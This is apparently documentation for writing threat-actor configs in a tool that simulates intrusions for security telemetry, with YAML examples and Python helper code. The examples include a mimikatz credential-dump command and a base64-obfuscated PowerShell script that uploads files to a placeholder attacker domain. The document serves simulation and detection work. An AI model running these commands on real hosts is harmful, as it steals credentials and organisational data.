Actor Configs
The threat actor configs are modeled after the MITRE ATT&CK framework. The outermost categories correspond to the tactics in ATT&CK, which lets us define which techniques an actor is able to use at each stage of the intrusion. See: https://attack.mitre.org/matrices/enterprise/
```yaml
metadata:
  ...
reconnaissance:
  ...
resource_development:
  ...
initial_access:
  ...
credential_access:
  ...
discovery:
  ...
impact:
  ...
exfiltration:
  ...
```
- Activity start and end dates should fall within the bounds of the company activity dates.
- `effectiveness` is currently only used to determine how likely the actor's emails are to be accepted.
- `max_wave_size` determines the maximum number of emails an actor may send in a single "wave".
- `activity_start_hour`, `workday_length_hours` and `working_days` together define the pattern of life for the actor. You should try to make this differ from the company's pattern of life, so that actor activity does not simply blend into normal business hours.
```yaml
metadata:
  name: ELRONA
  effectiveness: 99
  count_init_passive_dns: 2
  max_wave_size: 5
  activity_start_date: "2023-06-15"
  activity_end_date: "2023-11-01"
  activity_start_hour: 10
  workday_length_hours: 6
  working_days:
    - Monday
    - Wednesday
    - Thursday
    - Friday
```
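The following is an added example (not the generator's own code) showing how the `metadata` fields above translate into a concrete activity window, and the two checks a config author wants before running: that the actor's dates sit inside the company's dates, and how much the actor's working hours overlap the company's. The `ACTOR` dict mirrors the YAML above; `COMPANY` is a constructed stand-in for the company config and is assumed, for this example only, to use the same key names.

```python
"""Pattern-of-life checks for an actor config (added example, not project code)."""
from datetime import date, datetime

# Mirrors the `metadata` block of the ELRONA example on this page.
ACTOR = {
    "name": "ELRONA",
    "activity_start_date": "2023-06-15",
    "activity_end_date": "2023-11-01",
    "activity_start_hour": 10,
    "workday_length_hours": 6,
    "working_days": ["Monday", "Wednesday", "Thursday", "Friday"],
}

# Constructed company pattern of life (assumption: same keys as actor metadata).
COMPANY = {
    "activity_start_date": "2023-01-01",
    "activity_end_date": "2023-12-31",
    "activity_start_hour": 9,
    "workday_length_hours": 8,
    "working_days": ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday"],
}

DAY_NAMES = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]


def _as_datetime(when):
    """Accept either a datetime or an ISO-8601 string such as '2023-07-05T11:00'."""
    return datetime.fromisoformat(when) if isinstance(when, str) else when


def _hours(meta):
    """(start, end) clock hours of the working window; end is exclusive."""
    start = int(meta["activity_start_hour"])
    return start, start + int(meta["workday_length_hours"])


def is_active_at(meta, when):
    """True if `when` falls inside the actor's date range, working days and hours."""
    when = _as_datetime(when)
    first = date.fromisoformat(meta["activity_start_date"])
    last = date.fromisoformat(meta["activity_end_date"])
    if not first <= when.date() <= last:
        return False
    if DAY_NAMES[when.weekday()] not in meta["working_days"]:
        return False
    start, end = _hours(meta)
    return start <= when.hour + when.minute / 60 < end


def validate_dates_within_company(actor, company):
    """Return a list of problems; empty means the actor dates fit inside the company dates."""
    a0, a1 = (date.fromisoformat(actor[k]) for k in ("activity_start_date", "activity_end_date"))
    c0, c1 = (date.fromisoformat(company[k]) for k in ("activity_start_date", "activity_end_date"))
    problems = []
    if a0 > a1:
        problems.append("actor activity_start_date is after activity_end_date")
    if a0 < c0:
        problems.append(f"actor starts {a0}, before company start {c0}")
    if a1 > c1:
        problems.append(f"actor ends {a1}, after company end {c1}")
    return problems


def weekly_overlap_hours(actor, company):
    """Hours per week where the actor's and the company's working windows coincide.

    The page advises making the actor's pattern of life differ from the company's;
    a low number here means actor events stand out on the timeline.
    """
    a0, a1 = _hours(actor)
    c0, c1 = _hours(company)
    per_day = max(0, min(a1, c1) - max(a0, c0))
    shared_days = set(actor["working_days"]) & set(company["working_days"])
    return per_day * len(shared_days)
```

With the ELRONA hours (10:00 to 16:00) every actor hour falls inside a 9-to-5 company week, 24 overlapping hours per week; moving `activity_start_hour` to 18 brings that to zero, which is the kind of separation the guidance above asks for.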
- `recon_search_terms` determine what terms the actor will search for on the company domains. Each term appears in OutboundBrowsingEvents as a URL-encoded path on the company domain, e.g. `https://companydomain.com/research%20projects`.
```yaml
recon_search_terms:
  - "research projects"
  - "proprietary data"
  - "academic collaborations"
  - "research team"
  - "confidential reports"
  - "data analysis"
```
- This category defines how the actor will acquire the infrastructure used in operations (e.g. domains, email addresses, email subjects, email attachment filenames).
- Domains are generated arbitrarily from the list of provided domain themes. `domain_depth` determines how many themed words are combined to form each generated domain. So:
  - `domain_depth: 1` -> `science.site`
  - `domain_depth: 2` -> `science-vaccine.site`
- `tlds` determine the top-level domains used by the actor. You may include as many as you want; they don't have to be real.
- `malware` refers to the malware that can be used by the actor. You may include multiple, but each must exist in the malware configs. E.g. if you include `frp`, there must be a file called `frp.yaml` in the malware folder.
```yaml
resource_development:
  domain_depth: 2
  domain_themes:
    - science
    - discovery
    - academia
    - vaccine
    - covid
    - cure
  tlds:
    - site
    - xyz
  file_names:
    - "ResearchReport.pdf"
    - "ConfidentialFindings.docx"
    - "DataAnalysisResults.xlsx"
    - "ProjectPresentation.ppt"
  malware:
    - frp
```
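Added example (not the generator's own code) covering the `reconnaissance` and `resource_development` sections above: it generates themed domains from `domain_depth`, `domain_themes` and `tlds`, renders recon search terms as the OutboundBrowsingEvents URLs described earlier, and checks that every entry in `malware` has a matching `<name>.yaml`. Assumptions: words are joined with `-` as in the `science-vaccine.site` example (the page does not specify the separator), theme words within one domain are distinct, and malware configs live in a folder passed in as `malware_dir`. The temp folder and the `missing_tool` name in the demo are constructed for the check.

```python
"""Infrastructure generation and reference checks (added example, not project code)."""
import math
import os
import random
import tempfile
from urllib.parse import quote

# Mirrors the resource_development block above.
RESOURCE_DEVELOPMENT = {
    "domain_depth": 2,
    "domain_themes": ["science", "discovery", "academia", "vaccine", "covid", "cure"],
    "tlds": ["site", "xyz"],
    "malware": ["frp"],
}


def generate_domains(cfg, count, seed=0):
    """Return up to `count` distinct themed domains, e.g. 'science-vaccine.site' at depth 2.

    Assumption: `domain_depth` distinct theme words joined with '-', then a random tld.
    """
    depth = int(cfg["domain_depth"])
    themes, tlds = list(cfg["domain_themes"]), list(cfg["tlds"])
    if not 1 <= depth <= len(themes):
        raise ValueError(f"domain_depth must be between 1 and {len(themes)} for these themes")
    # Cap at the number of possible ordered word combinations so the loop always ends.
    count = min(count, math.perm(len(themes), depth) * len(tlds))
    rng = random.Random(seed)  # seeded so a scenario is reproducible
    domains = set()
    while len(domains) < count:
        words = rng.sample(themes, depth)  # distinct words, never 'science-science'
        domains.add("-".join(words) + "." + rng.choice(tlds))
    return sorted(domains)


def recon_urls(company_domain, terms):
    """Render recon_search_terms as they appear in OutboundBrowsingEvents (URL-encoded path)."""
    return [f"https://{company_domain}/{quote(term)}" for term in terms]


def missing_malware_configs(cfg, malware_dir):
    """Names in `malware` that have no <name>.yaml file in malware_dir."""
    return [m for m in cfg["malware"] if not os.path.isfile(os.path.join(malware_dir, f"{m}.yaml"))]


def demo_malware_check():
    """Constructed check: a temp malware folder containing only frp.yaml."""
    with tempfile.TemporaryDirectory() as malware_dir:
        open(os.path.join(malware_dir, "frp.yaml"), "w").close()
        cfg = dict(RESOURCE_DEVELOPMENT, malware=["frp", "missing_tool"])
        return missing_malware_configs(cfg, malware_dir)


if __name__ == "__main__":
    print(generate_domains(dict(RESOURCE_DEVELOPMENT, domain_depth=1), 3))
    print(generate_domains(RESOURCE_DEVELOPMENT, 5))
    print(recon_urls("companydomain.com", ["research projects", "proprietary data"]))
    print("missing malware configs:", demo_malware_check())
```

Running the malware check before a scenario starts catches the `frp.yaml` rule above at config time instead of part way through a generated intrusion.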
See: actions
Here, we generally want to run some commands that correspond to the credential access phase.
Important: only the `dump_credentials` action allows the actor to actually capture cached credentials and use them to move laterally; the `run_process_commands` entries just simulate the tooling that would be observed on the host.
```yaml
credential_access:
  - run_process_commands:
      - process: mimikatz.exe "sekurlsa::logonpasswords"
  - dump_credentials
  - create_files:
      - path: C:\\Windows\\Temp\\mimikatz_output.txt
```
Discovery: run a series of actions an actor might take to learn more about a newly compromised host. This happens only once, immediately after the actor compromises a machine.
See actions for more.
Impact: run actions an actor might use to ransom the org.
See actions for more.
Exfiltration: run actions an actor might use to exfiltrate data from the org.
See actions for more.
Domain Controller Commands: commands the actor runs on all domain-joined hosts in the environment after compromising the domain controller.
```yaml
domain_controller_commands: #persistence
  - process: "nltest /dsgetdc:domain.local"
  - process: "dsquery server -domain domain.local"
```
Final Target Roles: roles of employees the actor will run impact and exfiltration actions on. Use this for targeted campaigns; omit it to take action indiscriminately.
```yaml
final_target_roles:
  - Lead Researcher
  - Chief Scientist
```
A complete actor config, combining the sections above:
```yaml
metadata:
  name: ELRONA
  effectiveness: 99
  count_init_passive_dns: 2
  max_wave_size: 5
  activity_start_date: "2023-06-15"
  activity_end_date: "2023-11-01"
  activity_start_hour: 10
  workday_length_hours: 6
  working_days:
    - Monday
    - Wednesday
    - Thursday
    - Friday
reconnaissance:
  recon_search_terms:
    - "research projects"
    - "proprietary data"
    - "academic collaborations"
    - "research team"
    - "confidential reports"
    - "data analysis"
resource_development:
  domain_depth: 2
  domain_themes:
    - science
    - discovery
    - academia
    - vaccine
    - covid
    - cure
  tlds:
    - site
  file_names:
    - "ResearchReport.pdf"
    - "ConfidentialFindings.docx"
    - "DataAnalysisResults.xlsx"
    - "ProjectPresentation.ppt"
  malware:
    - frp
initial_access:
  attacks:
    - recon:browsing
    - watering_hole:malware_delivery
  watering_hole_domains:
    - wesellbeakers.online
credential_access:
  - run_process_commands:
      - process: mimikatz.exe "sekurlsa::logonpasswords"
  - dump_credentials
  - create_files:
      - path: C:\\Windows\\Temp\\mimikatz_output.txt
discovery:
  - run_process_commands:
      - process: systeminfo
      - process: netstat -ano
      - process: tasklist
domain_controller_commands: #persistence
  - process: "nltest /dsgetdc:domain.local"
  - process: "dsquery server -domain domain.local"
impact:
  - create_files:
      - path: "C:\\Users\\Public\\Documents\\ResearchExfil\\RESEARCH_DATA_{{username}}.zip"
  - run_process_commands:
      - name: powershell.exe
        process: |
          $sourcePath = 'C:\Users\Public\Documents\ResearchExfil\' # Source folder
          $destinationURL = 'http://{{actor_domain}}/exfil/' # Destination URL
          # Get all files recursively in the source directory
          $files = Get-ChildItem -Path $sourcePath -File -Recurse
          # Iterate through each file and send to the external location
          foreach ($file in $files) {
              $filePath = $file.FullName
              $destination = $destinationURL + $file.Name
              # Use Invoke-RestMethod to send the file via HTTP POST
              Invoke-RestMethod -Uri $destination -Method Post -InFile $filePath
          }
        obfuscation:
          - base64
final_target_roles:
  - Lead Researcher
  - Chief Scientist
```
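Added example (not the generator's own code) that walks the action lists of the config above (`credential_access`, `impact`) and renders them into the command lines and file paths a host log would show, then decodes them again the way a detection rule would. Assumptions, none of which the page states: `{{username}}` and `{{actor_domain}}` are simple placeholders substituted at run time; `obfuscation: [base64]` on a `powershell.exe` entry means the script is passed with `-EncodedCommand`, which PowerShell defines as base64 of the UTF-16LE script; and a bare list item such as `dump_credentials` is a built-in action rather than a process. The action dicts below are constructed from the YAML, with the PowerShell script shortened to the lines that carry a placeholder.

```python
"""Render actor actions into observable command lines, and decode them (added example)."""
import base64
import re

# Constructed from the credential_access and impact lists of the full example above.
CREDENTIAL_ACCESS = [
    {"run_process_commands": [{"process": 'mimikatz.exe "sekurlsa::logonpasswords"'}]},
    "dump_credentials",
    {"create_files": [{"path": "C:\\Windows\\Temp\\mimikatz_output.txt"}]},
]
IMPACT = [
    {"create_files": [{"path": "C:\\Users\\Public\\Documents\\ResearchExfil\\RESEARCH_DATA_{{username}}.zip"}]},
    {"run_process_commands": [{
        "name": "powershell.exe",
        "process": "$destinationURL = 'http://{{actor_domain}}/exfil/'\n"
                   "Invoke-RestMethod -Uri ($destinationURL + $file.Name) -Method Post -InFile $file.FullName\n",
        "obfuscation": ["base64"],
    }]},
]

PLACEHOLDER = re.compile(r"\{\{(\w+)\}\}")


def fill(template, context):
    """Substitute {{name}} placeholders (assumed syntax); unknown names stay visible."""
    return PLACEHOLDER.sub(lambda m: str(context.get(m.group(1), m.group(0))), template)


def encode_powershell(script):
    """-EncodedCommand takes base64 of the UTF-16LE encoded script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded):
    return base64.b64decode(encoded).decode("utf-16-le")


def render_actions(actions, context):
    """Return (kind, rendered) tuples: 'builtin', 'create_file' or 'process'."""
    rendered = []
    for action in actions:
        if isinstance(action, str):  # bare built-in such as dump_credentials (assumption)
            rendered.append(("builtin", action))
            continue
        for kind, items in action.items():
            for item in items:
                if kind == "create_files":
                    rendered.append(("create_file", fill(item["path"], context)))
                elif kind == "run_process_commands":
                    script = fill(item["process"], context)
                    name = item.get("name", "")
                    if "base64" in item.get("obfuscation", []) and name.lower() == "powershell.exe":
                        rendered.append(("process", f"{name} -EncodedCommand {encode_powershell(script)}"))
                    else:
                        rendered.append(("process", f"{name} {script}".strip()))
                else:
                    raise ValueError(f"unknown action type {kind!r}")
    return rendered


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so a detection has to match the prefixes, not just the full flag.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def extract_encoded_script(command_line):
    """Defender side: recover the script from an encoded PowerShell command line, else None."""
    m = ENCODED_RE.search(command_line)
    return decode_powershell(m.group(1)) if m else None


if __name__ == "__main__":
    ctx = {"username": "jdoe", "actor_domain": "science-vaccine.site"}
    for kind, line in render_actions(CREDENTIAL_ACCESS, ctx) + render_actions(IMPACT, ctx):
        print(kind, line)
        decoded = extract_encoded_script(line)
        if decoded:
            print("  decoded:", decoded.strip().replace("\n", " | "))
```

The decode step is the part worth keeping: with `obfuscation: - base64` the raw process event never contains `{{actor_domain}}` or the `/exfil/` path in clear text, so a rule that only string-matches the command line misses it unless it first unwraps `-EncodedCommand`.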